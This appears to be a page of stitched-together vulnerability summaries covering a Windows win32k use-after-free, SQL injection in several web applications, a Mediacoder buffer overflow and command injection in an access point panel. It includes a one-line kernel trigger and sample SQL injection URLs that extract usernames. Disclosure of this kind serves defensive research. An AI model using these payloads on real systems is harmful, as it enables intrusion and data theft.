Due to hostility toward security researchers, the most recent example being of Tavis Ormandy, a number of us from the industry (and some not from the industry) have come together to form MSRC: the Microsoft-Spurned Researcher Collective. MSRC will fully disclose vulnerability information discovered in our free time, free from retaliation against us or any inferred employer. win32k!NtUserCheckAccessForIntegrityLevel in Vista/Server 2008 calls LockProcessByClientId() on the specified ClientID. When this call fails, the refcount will be first decremented by nt!ObfDereferenceObject and then by win32k!NtUserCheckAccessForIntegrityLevel again, resulting in a refcount leak. The refcount leak can be abused to have an in-use process object deleted. (use-after-free). The vulnerability can be triggered in one line below, where 4 is just the PID of PsInitialSystemProcess. While (1) NtUserCheckAccessForIntegrityLevel(4, 0, NULL); Since there's no exported stub for this system call, you'll have to craft the call manually. sysenter is your friend.
The application is vulnerable in several sections, however, until version 1389, the Research Plans section is vulnerable. In the Research Plans section, there is a form with no input validation in the email field. An attacker can submit a query in the email field and leave the password field empty to get the DBMS version.
Joomla AD/BS Date Converter is a Joomla Component used to convert date between Gregorian Calendar and Bikram Sambat Calendar. BS Calendar is used in Nepal, India, Bhutan, Sri Lanka, Thailand etc. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. This can be used to extract sensitive information from the database.
Mediacoder v0.7.3.4682 is vulnerable to a universal buffer overflow vulnerability due to improper bounds checking of user-supplied data. An attacker can exploit this vulnerability by sending a specially crafted malicious file to the vulnerable application. This can result in arbitrary code execution in the context of the application.
This exploit is a Remote Blind SQL Injection exploit for Oxygen2PHP <= 1.1.3. It is coded by Dante90 and WaRWolFz Crew and was discovered by the same. It uses LWP::UserAgent, HTTP::Request::Common, Time::HiRes, and IO::Socket to exploit the vulnerability. It takes the UID as an argument and then uses a loop to iterate through the characters of the hash. It then uses the benchmark() function to check if the character is correct or not. If it is correct, it prints it out and continues to the next character.
This exploit is a 0-day exploit for Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection. It was discovered by Dante90 and WaRWolFz Crew and coded by Dante90 and WaRWolFz Crew. It uses a GET request to inject malicious code into the vulnerable website and extract the password hash from the database. The exploit uses a loop to iterate through the characters of the hash and uses a benchmark to determine if the character is correct or not.
Setiran CMS is vulnerable to Blind SQL injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'id' in the URL. For example, http://server/Setiran/index.asp?id=1' and 1=convert(int,(select top 1 username from users))-- and http://server/Setiran/?id=522' and 1=convert(int,(select top 1 username from users))-- can be used to inject malicious SQL queries.
If administrator of the board browse PoC attacker can gain privilege access.
With not privileged account, like read-only, an attacker is able to execute commands into the system via web application panel. Knowing that the system.cfg file is located in /tmp/ directory, will be simple read the content (like users, password, wireless key ecc.). The vulnerable function is about 'Show AP info', that is located in the main page of web panel in the section 'Extra Informations'.
A SQL injection vulnerability exists in the Golf Club web application. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can allow the attacker to gain access to sensitive information stored in the database.
Services By CQR